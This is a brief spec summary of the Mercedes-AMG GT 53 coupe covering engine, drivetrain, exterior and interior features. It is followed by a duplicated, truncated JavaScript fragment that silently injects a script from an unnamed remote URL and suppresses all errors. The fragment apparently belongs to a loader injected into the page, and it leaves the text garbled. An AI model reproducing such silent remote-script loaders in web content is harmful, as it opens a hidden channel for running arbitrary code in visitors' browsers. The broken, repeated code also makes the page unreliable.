Mercedes-Benz AMG GT53
The Mercedes-Benz AMG GT 53, is a high-performance 4-door coupe with a 3.0-liter inline-6 turbocharged engine and 4MATIC+ all-wheel drive. It typically features a 9-speed automatic transmission and offers a blend of luxury and sporty performance.
Here’s a breakdown of key details:
Engine and Performance:
Engine: 3.0-liter inline-6 turbocharged with EQ Boost.
Horsepower: 429 HP.
Torque: 384 lb-ft.
Transmission: AMG SPEEDSHIFT TCT 9-speed automatic.
Drivetrain: AMG Performance 4MATIC+ all-wheel drive.
0-60 mph: Approximately 4.4 seconds.
Exterior:
Body Style: 4-door coupe.
Wheels: 21″ wheels, with AMG-specific designs.
Other Features: AMG-specific front section, MULTIBEAM LED headlamps, AMG twin tailpipes, and rear spoiler.
Interior:
Seating: a 5-seater configuration.
Materials: Premium materials like Nappa leather and microfiber.
Features: Advanced infotainment system, power seats with memory, paddle shifters, and potentially cooled front seats.
Other notable features:
Export Status: The AMG GT 53 can be exported.
Safety: ABS, all-wheel drive, child locks, and other safety features.
Infotainment: Bluetooth system, tuner/radio, and infotainment options.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();